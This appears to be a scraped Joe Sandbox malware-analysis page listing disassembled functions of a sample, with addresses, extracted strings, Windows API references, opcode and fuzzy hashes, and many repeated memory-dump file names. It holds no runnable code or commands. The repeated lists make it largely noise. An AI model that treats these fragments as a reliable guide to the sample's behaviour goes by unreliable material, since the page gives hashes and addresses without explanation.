Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: %$&$9$<$R$T$W$b
API String ID: 0-3780034300
Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction ID: 1b60fefce01cf48b8697351873522eba04f24ac69442e6c006b840c476e7b29f
Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction Fuzzy Hash: 4D71912151C7D28AD311867C488425FAFD25BE3634F2C8FADE4E5973D2C569C50AA363

Function 00B1A8A0 Relevance: 7.9, Strings: 6, Instructions: 408COMMON

Download Yara Rule

Strings

lI, xrefs: 00B1ACBE
UUp, xrefs: 00B1A9F0
T_XY, xrefs: 00B1A9E3
<, xrefs: 00B1A8BE
%", xrefs: 00B1AA62
~9, xrefs: 00B1A93B

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: %"$<$T_XY$UUp$lI$~9
API String ID: 0-1611585724
Opcode ID: d23dec4c54d8e5024d1a70ffd48426c67a9b50b3260e3783833263b046eabcd3
Instruction ID: 0f31b6fc953bbf44782b833b2b657d35272cecb8bdab01572ecaafbedd81e4d0
Opcode Fuzzy Hash: d23dec4c54d8e5024d1a70ffd48426c67a9b50b3260e3783833263b046eabcd3
Instruction Fuzzy Hash: 97C1277164D3904FC318CFA898902AFFBE2EBD2314F5C85ACE4E54B381D675994A8783

Function 00B36360 Relevance: 6.9, Strings: 5, Instructions: 628COMMON

Download Yara Rule

Strings

dMKP, xrefs: 00B36444
lmeH, xrefs: 00B36454
Sin;, xrefs: 00B3644C
xHLG, xrefs: 00B364F1, 00B364F5
YzW+, xrefs: 00B36434

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: Sin;$YzW+$dMKP$lmeH$xHLG
API String ID: 0-2485238161
Opcode ID: 4234ab91fde2d7bb6baa59d372bb08663309b19d8a7bf63e1f0cb767c1df3987
Instruction ID: 69a794807537fc33071cb4997a7953261332f6505a19327c0f8a5c87b971d9d5
Opcode Fuzzy Hash: 4234ab91fde2d7bb6baa59d372bb08663309b19d8a7bf63e1f0cb767c1df3987
Instruction Fuzzy Hash: 5F2233B16083819FD7109F29D8917ABBBE1EFC6300F2889ADE5C59B381DB35D905CB52

Function 00B29820 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1415COMMON

Download Yara Rule

APIs

Part of subcall function 00B4D910: LdrInitializeThunk.NTDLL(00B1D0E7,00000002,00000004,?), ref: 00B4D93E

FreeLibrary.KERNEL32(?), ref: 00B29E7D
FreeLibrary.KERNEL32(?), ref: 00B29F1E

Strings

NO, xrefs: 00B29CFE

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: NO
API String ID: 764372645-3376426101
Opcode ID: 71956c9f33ba180b04e2c4cf80a2309aa4a50ba7dfc4adb25713d6cbc4bebec2
Instruction ID: 73328b8e6f85c314fbbc125826d9d8205b67b1cea790965cb6afa4f7e53a5c4c
Opcode Fuzzy Hash: 71956c9f33ba180b04e2c4cf80a2309aa4a50ba7dfc4adb25713d6cbc4bebec2
Instruction Fuzzy Hash: FE921971A183519BD724CF24E880B2BBBE3EBD5304F29C9ACD48D97265EA75DC41CB42

Function 00B37CB0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00B37DC0
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00B37E49

Strings

7e1, xrefs: 00B37FFA

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1
API String ID: 237503144-1127181755
Opcode ID: 81e202b6f390cdeb83ae5c7a3a1dceabe01cb40c19a932445281bef5d5378f42
